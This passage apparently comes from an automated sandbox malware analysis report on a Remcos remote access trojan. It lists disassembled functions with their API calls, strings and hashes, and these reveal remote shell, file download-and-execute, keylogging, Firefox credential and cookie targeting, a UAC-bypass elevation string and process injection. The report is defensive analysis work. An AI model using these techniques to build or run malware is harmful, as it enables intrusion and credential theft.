                                                                                                                        Function 00415702 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000), ref: 00415715
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: b719ef6b59ec87dbdd425382226ab480a10e0a19536f09fc3559574bb5907df1
                                                                                                                        • Instruction ID: f382e6b5168fe8f350e331b78b3d6dca2a18559efdd8391db893a32af1609f21
                                                                                                                        • Opcode Fuzzy Hash: b719ef6b59ec87dbdd425382226ab480a10e0a19536f09fc3559574bb5907df1
                                                                                                                        • Instruction Fuzzy Hash: DDE0E63111824186C614FB71E856BFE73A5EFD0315F40487FF84A974E2EF389949C69A
                                                                                                                        Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Startup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 724789610-0
                                                                                                                        • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                        • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                        • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                        • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                        Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: send
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2809346765-0
                                                                                                                        • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                        • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                        • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                        • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                        Function 0040262E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Deallocate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1075933841-0
                                                                                                                        • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                        • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                        • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                        • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                          • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                          • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                          • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                          • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                        • API String ID: 2918587301-599666313
                                                                                                                        • Opcode ID: feca6684fce2c2db025fdbbb39b393b62026ffe9abbb33392957b1be0ebca74f
                                                                                                                        • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                                        • Opcode Fuzzy Hash: feca6684fce2c2db025fdbbb39b393b62026ffe9abbb33392957b1be0ebca74f
                                                                                                                        • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                                        Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                        • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                        • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                        • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                                        • API String ID: 3815868655-81343324
                                                                                                                        • Opcode ID: c5c25fea02136d832433109724d9b2fd2cfe10b9d582a035314f1e06b45d0376
                                                                                                                        • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                        • Opcode Fuzzy Hash: c5c25fea02136d832433109724d9b2fd2cfe10b9d582a035314f1e06b45d0376
                                                                                                                        • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                        Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                        • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                        • API String ID: 65172268-860466531
                                                                                                                        • Opcode ID: 6bb724df5b67df371780ca0b8c3fa9dacbf220518a995c3a182ab50fa5fe6213
                                                                                                                        • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                        • Opcode Fuzzy Hash: 6bb724df5b67df371780ca0b8c3fa9dacbf220518a995c3a182ab50fa5fe6213
                                                                                                                        • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                        Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                                        • Opcode ID: 9e054693df0014b2dd5a04db660c3abf1fb9ec8942d5a79e0294493ac8abc5ef
                                                                                                                        • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                        • Opcode Fuzzy Hash: 9e054693df0014b2dd5a04db660c3abf1fb9ec8942d5a79e0294493ac8abc5ef
                                                                                                                        • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                        Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                        • API String ID: 3527384056-432212279
                                                                                                                        • Opcode ID: 9416c16fafc90949b133e07b3667b00ba5688b0f9ef9d0859adbcaa53ffad0a4
                                                                                                                        • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                        • Opcode Fuzzy Hash: 9416c16fafc90949b133e07b3667b00ba5688b0f9ef9d0859adbcaa53ffad0a4
                                                                                                                        • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                        Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                        • API String ID: 726551946-3025026198
                                                                                                                        • Opcode ID: 41470707ce2cf1d296282bdd86645310f2a90acdf384f79c6299c5c0c6affc21
                                                                                                                        • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                        • Opcode Fuzzy Hash: 41470707ce2cf1d296282bdd86645310f2a90acdf384f79c6299c5c0c6affc21
                                                                                                                        • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                        Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                                                                        • API String ID: 0-3177665633
                                                                                                                        • Opcode ID: dc3d60b63999588b41a60ffc37880a3031f904f50fb3e0113cd6e02121726fea
                                                                                                                        • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                        • Opcode Fuzzy Hash: dc3d60b63999588b41a60ffc37880a3031f904f50fb3e0113cd6e02121726fea
                                                                                                                        • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                        Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                        • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                        • String ID: 8[G
                                                                                                                        • API String ID: 1888522110-1691237782
                                                                                                                        • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                        • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                        • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                        • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                        Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00406788
                                                                                                                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object_wcslen
                                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                        • API String ID: 240030777-3166923314
                                                                                                                        • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                        • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                        • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                        • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                        Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                        • GetLastError.KERNEL32 ref: 00419935
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3587775597-0
                                                                                                                        • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                        • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                        • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                        • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                        Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                        • String ID: <D$<D$<D
                                                                                                                        • API String ID: 745075371-3495170934
                                                                                                                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
